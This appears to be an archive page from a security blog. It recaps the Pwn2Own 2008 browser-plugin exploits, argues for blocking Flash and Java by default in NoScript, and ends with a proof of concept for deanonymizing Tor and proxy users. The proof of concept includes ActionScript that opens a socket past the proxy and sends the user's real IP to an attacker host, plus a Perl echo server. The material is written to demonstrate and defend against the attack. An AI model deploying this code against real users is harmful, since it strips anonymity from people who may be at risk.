Archive for the Java Category

So we've got the juicy details now.
On the 2nd day of the the Pwn2Own contest, Vista has been owned by an unholy trinity of browser technologies:

  1. Java has been used to inject the native payload in a known executable memory area, effectively bypassing Vista's DEP.
  2. A Flash vulnerability (an unhandled exceeding function argument, maybe due to a bug in the Visual Studio compiler or linker) has been exploited for jumping to the prefilled location.
  3. JavaScript joined the party too, and my educated guess is that it just bridged the pointer location from the Java applet to the Flash object, since both are scriptable.

The full interview with Shane Macaulay (the Flash vulnerability finder) and Alexander Sotirov (of JavaScript Feng Shui fame), who helped with the Java memory preparation trick, is here.
By the way, they say JavaScript Feng Shui had been used to mount the Safari attack which brought down Mac OS X on 1st day.
Just more confirmations of who the real winner is :)

CanSecWest's Pwn2Own 2008 contest had heavy coverage in the past days, so I will recap rules and results very quickly.

Three targets, all patched. All in typical client configurations with typical user configurations. You hack it, you get to keep it.

Targets (typical road-warrior clients):

  • VAIO VGN-TZ37CN running Ubuntu 7.10
  • Fujitsu U810 running Vista Ultimate SP1
  • MacBook Air running OSX 10.5.2

    Competition started on March 26th, and was meant to last 3 days with decreasing difficulty level:

    1. Bare OS, no extra application
      No laptop got hacked
    2. Applications bundled with the OS (e.g. web browser)
      Mac OS X got pwned through a Safari vulnerability
    3. 3rd party popular applications
      Vista fell down because of a Flash vulnerability reportedly exploited through a Java vector

    Needless to say, after day 2 titles were slight variations on the "Mac OS X Hacked First" theme, while last day the song changed into "Vista Breached, Linux Unbeaten", casting the event into a security contest among OSes.
    While I'm very happy to see a free (as in beer and as in speech) software being depicted by media coverage as the best choice (security wise) over two commercial alternatives, I think that Nathan Mc Feters, even as biased toward Microsoft as he sounds recently, offers a rather objective report:

    1. None of the 3 OSes could be violated 1st day, when pure OS security was tested
    2. Mac OS X was taken because the high-level softwares it bundles (especially its web browser and multimedia plugins) are not as safe as its FreeBSD-derivative core
    3. Vista was hacked because, notwithstanding all its security enhancements, ubiquitous 3rd party software can work around them and make a relatively safe OS exploitable

    Now some simple considerations:

    • Safari is a web browser
    • Flash and Java are browser-hosted tecnologies, and they're both cross-platform: in facts, according to Shane Macaulay who won the Vista laptop, the vulnerabilities he found "could affect Linux or Mac OS X" too
    • The browser appears to be the weakest spot in PC security, no matter the OS, while it's probably the single most used application

    Corollary: whatever OS you prefer, never browse the web without NoScript :)

    Just 3 of the many reasons why I'm seriously considering to ship next NoScript versions with Forbid Macromedia® Flash®, Forbid Microsoft® Silverlight™ and Forbid other plugins checked by default in the Plugins options panel, like it already happens for Java™:

    1. A Quicktime RTSP Response vulnerability is being actively exploited in the wild.
    2. Programming errors in Flash or Silverlight applets can be as exploitable as traditional XSS/CSRF, if not more, no matter if the plugin itself is vulnerable or not. If recent attack on RSnake failed, it's most likely because he had NoScript configured to block Flash even on his own site. Not impractical as it may sound: in facts, you can select Apply these restrictions to trusted sites as well and enable multimedia clips or applets individually, on the fly with a click on their placeholder -- that's exactly what I do, by the way.
    3. As Pasqual Meunier of CERIAS put it,
      Fully functional PDF viewers are now about as safe and loyal (under your control) as your web browser with full scripting enabled. That may be good enough for some people, but clearly falls short for risk-averse industries.

    Update:

    Another good reason to keep Flash off by default.

    Update 2:

    And another... ;)

    Update 3:

    Oops! :P

    Update 4:

    I did it, in the end. NoScript now blocks all plugins by default on untrusted sites, and you can optionally extend this restrictions to trusted sites as well.

    Just not to be always destructive, a couple of flash(!) news about browser plugins issues we discussed in the past:

    1. The "Quicktime pwns default browsers" bug, after being worked around by Mozilla with the release of Firefox 2.0.0.7, has been fixed on the proper Apple side. Even if the advisory page refers to a SEP 21 date, the actual software update as been published right now.
    2. The Java evil popups I demonstrated two months ago have been addressed by Sun.

    On a side note, this Saturday I'm gonna get married.
    Cheers :)

    It's really time to sleep in my timezone, but I just couldn't resist when I read latest RSnake's post about Deanonymizing Tor and Detecting Proxies.

    The basic concept, not terribly new by the way, is that browser proxy settings cannot be enforced on browser plugins, which happily ignore them in some circumstances, e.g. when establishing a direct TCP socket connection.
    So if you're using a proxy to hide your internet address (like Tor users do), embeddable objects like Java applets can betray you, revealing your real identity to advertisers spying on your habits or, worse, to the police of a repressive state.

    This caveat has been preached even on the Tor download page itself, but nothing better than some scary demos to convert the non believers.

    RSnake's interesting proof of concept exploits JavaScript + LiveConnect , and it apparently works on Gecko-based browser with Java™ installed only. I didn't manage to make it work on Opera, even though it does support LiveConnect.

    So I decided to defer bedtime a bit and I put together my own quick deanonymizing proof of concept, which relies on the almost ubiquitous Macromedia® Flash® and works in any web browser, like Internet Explorer, supporting the Flash player (no need for JavaScript, either).
    The

    XMLSocket

    ActionScript object is used to bypass browser's proxy setting and connect to a tiny server written in Perl, listening on port 9999 and echoing client's IP.

    Here's the ActionScript code:

    1. var socket = new XMLSocket();
    2. socket.onConnect = function(success) {
    3. socket.onXML = function(doc) {
    4. getURL("http://evil.hackademix.net/proxy_bypass?ip=" +
    5. doc.firstChild.firstChild.nodeValue);
    6. socket.close();
    7. };
    8. socket.send(new XML());
    9. };
    10. socket.connect("evil.hackademix.net", 9999);

    And here's the Perl server:

    1. #!/usr/bin/perl -w
    2. use strict;
    3. use IO::Socket;
    4.  
    5. my $port = shift || 9999;
    6. my $sock = new IO::Socket::INET(
    7. LocalPort => $port,
    8. Proto => 'tcp',
    9. Listen => SOMAXCONN,
    10. Reuse => 1);
    11. $sock or die "socket: $!";
    12. my($new_sock, $c_addr, $buf);
    13. while (($new_sock, $c_addr) = $sock->accept())
    14. {
    15. my ($client_port, $client_ip) = sockaddr_in($c_addr);
    16. print $new_sock "<ip>" . inet_ntoa($client_ip) . "</ip>\000";
    17. $new_sock->close();
    18. }

    Today's lesson is: if you want to stay anonymous, you'd better turn off Java, Flash and any other plugin!

    Update OCT-27

    I've just learned that some months ago a guy called yawnmoth demonstrated an Unmasking Java Applet. Just like my Flash-based one, this works also in browsers, like IE, not supporting LiveConnect.
    The lesson above obviously applies, even stronger.

    Demos

    Bad Behavior has blocked 1261 access attempts in the last 7 days.